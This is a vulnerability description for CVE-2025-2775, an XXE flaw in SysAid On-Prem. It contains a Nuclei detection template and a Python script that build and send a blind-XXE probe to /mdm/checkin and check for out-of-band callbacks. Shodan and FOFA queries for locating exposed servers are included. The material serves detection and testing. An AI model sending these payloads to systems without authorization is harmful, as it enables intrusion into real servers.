Vulnerability Description
SysAid On-Prem versions up to and including 23.3.40 contain an unauthenticated XML External Entity (XXE) injection in the MDM check-in handler (/mdm/checkin). Because the server resolves external entities declared in the request body, an unauthenticated attacker gains a file-read primitive and can escalate to administrator account takeover. The Nuclei template below detects the flaw blindly: it declares an external parameter entity pointing at an out-of-band (OAST) host and treats an HTTP callback from a Java client as confirmation that the entity was resolved.
id: CVE-2025-2775

info:
  name: SysAid On-Prem <= 23.3.40 - XML External Entity
  author: johnk3r
  severity: critical
  description: |
    SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives.
  reference:
    - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
    - https://documentation.sysaid.com/docs/24-40-60
  classification:
    epss-score: 0.51818
    epss-percentile: 0.9783
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2025-2775
    cwe-id: CWE-611
  metadata:
    max-request: 1
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:"1540720428"
    fofa-query: icon_hash=1540720428
  tags: cve,cve2025,oast,sysaid,xxe,kev,vkev

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /mdm/checkin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" ?>
        <!DOCTYPE foo [
        <!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{(unknown)}.dtd">
        %foo;
        ]>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 4b0a0048304602210096f7d85a6d113dc8b6dc9f4c1a77f4473a76ff20fd944dd6a1b76a233d2349ae022100f80f282ee139cc6670363c90dff5dc44043d5429a6d34c0ddf99dc332db4c875:922c64590222798bb761d5b6d8e72950
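The following Python script is an added worked example, not part of the Nuclei template above or of watchTowr's research. It reproduces the two halves of the check the template performs: building the blind-XXE probe body for /mdm/checkin, and applying the template's two word matchers (matchers-condition: and) to out-of-band interaction records. The interaction records are constructed inline in the shape interactsh reports them. The example goes slightly beyond the template in one respect: it also requires the callback path to contain the random DTD name, tying the hit to this specific probe; the template's own entity URL uses a placeholder whose value is not recoverable from the page as shown, so the use of the 5-letter random name there is an assumption. The send_probe helper and the target/callback hostnames are illustrative; nothing below contacts the network unless send_probe is called explicitly.

```python
"""Blind-XXE probe for SysAid /mdm/checkin and OAST callback evaluation.

Added example; not the Nuclei template's or watchTowr's code. Sample
interactions are constructed to mirror interactsh's fields.
"""
import random
import string
import urllib.error
import urllib.request


def random_dtd_name(length: int = 5) -> str:
    """Mirror of the template's {{to_lower(rand_text_alpha(5))}} variable:
    a random lowercase name so a callback can be tied to this probe."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def build_probe_body(callback_host: str, dtd_name: str) -> str:
    """Return the XML body POSTed to /mdm/checkin.

    The parameter entity %foo points at an external DTD on the callback
    host. A parser configured to resolve external entities fetches it while
    processing the DOCTYPE, so an HTTP hit on the collaborator proves the
    entity was resolved even though the HTTP response reveals nothing
    (blind XXE). Assumption: the random name is used as the DTD file name.
    """
    return (
        '<?xml version="1.0" ?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % foo SYSTEM "http://{callback_host}/{dtd_name}.dtd">\n'
        "%foo;\n"
        "]>\n"
    )


def send_probe(target: str, callback_host: str, dtd_name: str,
               timeout: float = 10.0) -> int:
    """POST the probe to <target>/mdm/checkin and return the HTTP status.

    Network helper for a live test; the response status is irrelevant to
    the verdict, which comes only from the OAST callback. Not called by the
    offline checks.
    """
    req = urllib.request.Request(
        f"{target.rstrip('/')}/mdm/checkin",
        data=build_probe_body(callback_host, dtd_name).encode(),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def is_vulnerable(interactions: list, dtd_name: str) -> bool:
    """Apply the template's matchers (matchers-condition: and) plus a path
    check; all conditions must hold on one and the same interaction.

    1. protocol == "http": a DNS-only hit shows the name was resolved but
       not that the DTD was fetched (egress filtering often stops at DNS).
    2. raw request contains "User-Agent: Java": attributes the fetch to the
       JVM's URL handler rather than a proxy, link previewer or scanner.
    3. (added here) the path carries this probe's DTD name, so a callback
       from some other scan on the same collaborator is not counted.
    """
    needle = f"/{dtd_name}.dtd"
    for inter in interactions:
        raw = inter.get("raw_request", "")
        if (inter.get("protocol") == "http"
                and "User-Agent: Java" in raw
                and needle in raw):
            return True
    return False


# Constructed sample interactions (hostnames and DTD name are made up).
DTD = "abcde"
SAMPLE_JAVA_HIT = [
    {"protocol": "dns", "raw_request": "abcde.oast.example.\tIN\tA\n"},
    {"protocol": "http", "raw_request":
        "GET /abcde.dtd HTTP/1.1\r\nUser-Agent: Java/11.0.2\r\n"
        "Host: abcde.oast.example\r\n\r\n"},
]
SAMPLE_DNS_ONLY = [
    {"protocol": "dns", "raw_request": "abcde.oast.example.\tIN\tA\n"},
]
SAMPLE_CURL_HIT = [
    {"protocol": "http", "raw_request":
        "GET /abcde.dtd HTTP/1.1\r\nHost: abcde.oast.example\r\n"
        "User-Agent: curl/8.0.1\r\n\r\n"},
]

if __name__ == "__main__":
    print(build_probe_body("abcde.oast.example", DTD))
    for label, sample in (("java", SAMPLE_JAVA_HIT),
                          ("dns-only", SAMPLE_DNS_ONLY),
                          ("curl", SAMPLE_CURL_HIT)):
        print(label, "->", "VULNERABLE" if is_vulnerable(sample, DTD) else "no match")
```

The DNS-only case is the one worth remembering when triaging results: many hardened environments resolve the collaborator name but block outbound HTTP, so the template's insistence on an HTTP interaction with a Java User-Agent trades some sensitivity for a verdict that actually means the parser fetched the external DTD.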